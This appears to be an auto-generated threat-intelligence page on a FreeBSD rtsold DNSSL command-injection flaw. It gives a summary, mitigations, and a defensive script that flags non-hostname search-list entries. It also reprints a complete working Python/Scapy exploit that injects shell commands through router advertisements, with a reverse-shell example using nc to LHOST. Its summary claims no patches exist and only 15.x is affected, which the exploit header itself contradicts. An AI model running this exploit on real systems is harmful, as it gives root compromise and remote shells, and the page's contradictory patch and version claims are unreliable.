FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
AI Analysis
Technical Summary
The FreeBSD rtsold daemon, which processes IPv6 router advertisements to configure network parameters, contains a critical remote code execution vulnerability in version 15.x. The vulnerability arises from improper handling of the DNSSL (DNS Search List) option within router advertisement messages. An attacker can send IPv6 router advertisements carrying a malformed DNSSL option that triggers this flaw, leading to arbitrary code execution on the target system without authentication or user interaction. The rtsold daemon runs with elevated privileges, so successful exploitation can result in full system compromise, affecting confidentiality, integrity, and availability. The presence of publicly available Python exploit code (EDB ID 52463) lowers the barrier for attackers to weaponize this vulnerability. Although no active exploitation has been reported, the critical severity and ease of exploitation make this a significant threat. The lack of official patches or mitigations at the time of disclosure necessitates immediate defensive measures. This vulnerability is particularly relevant for environments relying on FreeBSD 15.x for IPv6 network configuration, including ISPs, data centers, and enterprise networks. The attack vector is network-based: the attacker must be able to deliver router advertisements to the target, which is feasible from a local or already compromised network segment.
Potential Impact
European organizations using FreeBSD 15.x with rtsold enabled for IPv6 network configuration face a high risk of remote code execution attacks that can lead to full system compromise. This can result in unauthorized access to sensitive data, disruption of network services, and potential lateral movement within corporate networks. Critical infrastructure providers, telecommunications companies, and data centers are particularly vulnerable due to their reliance on robust IPv6 configurations and FreeBSD-based systems. The compromise of such systems could disrupt essential services, cause data breaches, and damage organizational reputation. Additionally, the exploitability without authentication or user interaction increases the likelihood of successful attacks, especially in environments with exposed IPv6 networks or insufficient network segmentation. The absence of patches at disclosure heightens the urgency for proactive mitigation to prevent exploitation and limit potential damage.
Mitigation Recommendations
1. Immediately monitor FreeBSD security advisories and apply official patches once released.
2. Until patches are available, disable the rtsold daemon if IPv6 router advertisement processing is not essential.
3. Implement strict network segmentation and filtering to block unauthorized IPv6 router advertisements, especially from untrusted or external sources.
4. Deploy Intrusion Detection/Prevention Systems (IDS/IPS) capable of detecting anomalous or malformed IPv6 router advertisements targeting DNSSL options.
5. Use firewall rules to restrict access to systems running rtsold, limiting exposure to potentially malicious network traffic.
6. Conduct network traffic analysis to identify suspicious IPv6 router advertisements and respond promptly.
7. Consider deploying endpoint detection and response (EDR) solutions to detect unusual process behavior indicative of exploitation.
8. Educate network administrators about the risks associated with IPv6 router advertisement handling and the importance of timely patching.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Norway, Denmark
Indicators of Compromise
- exploit-code (EDB 52463):

```python
# Exploit Title: FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
# Date: 2025-12-16
# Exploit Author: Lukas Johannes Möller
# Vendor Homepage: https://www.freebsd.org/
# Version: FreeBSD 13.x, 14.x, 15.x (before 2025-12-16 patches)
# Tested on: FreeBSD 14.1-RELEASE
# CVE: CVE-2025-14558
#
# Description:
# rtsold(8) processes IPv6 Router Advertisement DNSSL options without
# validating domain names for shell metacharacters. The decoded domains
# are passed to resolvconf(8), a shell script that uses unquoted variable
# expansion, enabling command injection via $() substitution.
#
# Requirements:
# - Layer 2 adjacency to target
# - Target running rtsold with ACCEPT_RTADV enabled
# - Root privileges (raw socket for sending RA)
# - Python 3 + Scapy
#
# References:
# https://security.FreeBSD.org/advisories/FreeBSD-SA-25:12.rtsold.asc
# https://github.com/JohannesLks/CVE-2025-14558

import argparse
import struct
import sys
import time

try:
    from scapy.all import (
        Ether, IPv6, ICMPv6ND_RA, ICMPv6NDOptPrefixInfo,
        ICMPv6NDOptSrcLLAddr, Raw, get_if_hwaddr, sendp
    )
except ImportError:
    sys.exit("[!] Scapy required: pip install scapy")


def encode_domain(name):
    """Encode domain in DNS wire format (RFC 1035)."""
    result = b""
    for label in name.split("."):
        if label:
            data = label.encode()
            result += bytes([len(data)]) + data
    return result + b"\x00"


def encode_payload(cmd):
    """Encode payload as DNS label with $() wrapper for command substitution."""
    payload = f"$({cmd})".encode()
    if len(payload) > 63:
        # Split long payloads across labels (dots inserted on decode)
        result = b""
        while payload:
            chunk = payload[:63]
            payload = payload[63:]
            result += bytes([len(chunk)]) + chunk
        return result + b"\x00"
    return bytes([len(payload)]) + payload + b"\x00"


def build_dnssl(cmd, lifetime=0xFFFFFFFF):
    """Build DNSSL option (RFC 6106) with injected command."""
    data = encode_domain("x.local") + encode_payload(cmd)
    # Pad to 8-byte boundary
    pad = (8 - (len(data) + 8) % 8) % 8
    data += b"\x00" * pad
    # Type=31 (DNSSL), Length in 8-octet units
    length = (8 + len(data)) // 8
    return struct.pack(">BBH", 31, length, 0) + struct.pack(">I", lifetime) + data


def build_ra(mac, payload):
    """Build Router Advertisement with malicious DNSSL."""
    return (
        Ether(src=mac, dst="33:33:00:00:00:01") /
        IPv6(src="fe80::1", dst="ff02::1", hlim=255) /
        ICMPv6ND_RA(chlim=64, M=0, O=1, routerlifetime=1800) /
        ICMPv6NDOptSrcLLAddr(lladdr=mac) /
        ICMPv6NDOptPrefixInfo(
            prefixlen=64, L=1, A=1,
            validlifetime=2592000, preferredlifetime=604800,
            prefix="2001:db8::"
        ) /
        Raw(load=build_dnssl(payload))
    )


def main():
    p = argparse.ArgumentParser(
        description="CVE-2025-14558 - FreeBSD rtsold DNSSL Command Injection",
        epilog="Examples:\n"
               "  %(prog)s -i eth0\n"
               "  %(prog)s -i eth0 -p 'id>/tmp/pwned'\n"
               "  %(prog)s -i eth0 -p 'nc LHOST 4444 -e /bin/sh'",
        formatter_class=argparse.RawDescriptionHelpFormatter
    )
    p.add_argument("-i", "--interface", required=True, help="Network interface")
    p.add_argument("-p", "--payload", default="touch /tmp/pwned", help="Command to execute")
    p.add_argument("-c", "--count", type=int, default=3, help="Packets to send (default: 3)")
    args = p.parse_args()

    try:
        mac = get_if_hwaddr(args.interface)
    except Exception as e:
        sys.exit(f"[!] Interface error: {e}")

    print(f"[*] Interface: {args.interface} ({mac})")
    print(f"[*] Payload: {args.payload}")

    pkt = build_ra(mac, args.payload)
    for i in range(args.count):
        sendp(pkt, iface=args.interface, verbose=False)
        print(f"[+] Sent RA {i+1}/{args.count}")
        if i < args.count - 1:
            time.sleep(1)
    print("[+] Done")


if __name__ == "__main__":
    main()
```
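The detection counterpart to the exploit above, covering mitigation items 4 and 6: this added example (not part of the original advisory, the exploit, or FreeBSD's own code) walks the ND option list of a Router Advertisement, decodes every DNSSL search-list entry using the same wire layout the exploit builds (type 31, length in 8-octet units, lifetime, then RFC 1035 labels), and flags entries that are not plain hostname labels, which is what an injected `$()` payload looks like on the wire. The option byte strings are constructed here for the demonstration, not captured traffic.

```python
import re

DNSSL_TYPE = 31                       # ND option type for DNS Search List (RFC 8106)
# Allowlist for hostname labels; "$(", "`", ";" and friends can never appear in a real one.
HOSTNAME_LABEL = re.compile(r"^[A-Za-z0-9_-]+$")

def decode_search_list(body):
    """Decode the RFC 1035 wire-format names that follow the DNSSL lifetime field."""
    names, labels, i = [], [], 0
    while i < len(body):
        n = body[i]
        i += 1
        if n == 0:                    # end of a name, or the zero padding after the last one
            if labels:
                names.append(".".join(labels))
                labels = []
            continue
        if n > 63 or i + n > len(body):   # compression pointers and overruns are not allowed
            raise ValueError("malformed DNSSL label")
        labels.append(body[i:i + n].decode("latin-1"))
        i += n
    return names

def parse_dnssl_domains(options):
    """Walk an RA's option list (the bytes after the 16-byte RA header) and collect DNSSL names."""
    domains, off = [], 0
    while off + 2 <= len(options):
        otype, olen = options[off], options[off + 1]
        end = off + olen * 8          # ND option length is in units of 8 octets
        if olen == 0 or end > len(options):
            raise ValueError("malformed ND option")
        if otype == DNSSL_TYPE:       # skip type, length, reserved (2) and lifetime (4)
            domains.extend(decode_search_list(options[off + 8:end]))
        off = end
    return domains

def suspicious_domains(domains):
    """Return every search-list entry containing a label that is not a plain hostname label."""
    return [d for d in domains if not all(HOSTNAME_LABEL.match(lab) for lab in d.split("."))]

# Constructed sample option lists (not captured traffic): source link-layer address, MTU, DNSSL.
BENIGN_OPTIONS = (b"\x01\x01\x02\x00\x00\x00\x00\x01" + b"\x05\x01\x00\x00\x00\x00\x05\xdc"
                  + b"\x1f\x03\x00\x00\x00\x00\x0e\x10\x07example\x03com\x00\x00\x00\x00")
# Same layout, but the second search-list entry is a shell substitution instead of a name.
INJECTED_OPTIONS = (b"\x01\x01\x02\x00\x00\x00\x00\x01"
                    + b"\x1f\x04\x00\x00\xff\xff\xff\xff\x01x\x05local\x00\x07$(true)\x00" + b"\x00" * 6)

if __name__ == "__main__":
    for tag, opts in (("benign", BENIGN_OPTIONS), ("injected", INJECTED_OPTIONS)):
        found = parse_dnssl_domains(opts)
        print(f"{tag}: search list {found}, flagged {suspicious_domains(found)}")
```

A malformed option (bad label length, truncated option) raises instead of being skipped, so a monitor built on this should treat the exception as a finding as well.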
Technical Details
- EDB ID: 52463
- Has exploit code: true
- Code language: python
Threat ID: 694d89022ffa995e0c012b37
Added to database: 12/25/2025, 6:57:06 PM
Last enriched: 12/25/2025, 6:57:42 PM
Last updated: 12/26/2025, 10:00:45 AM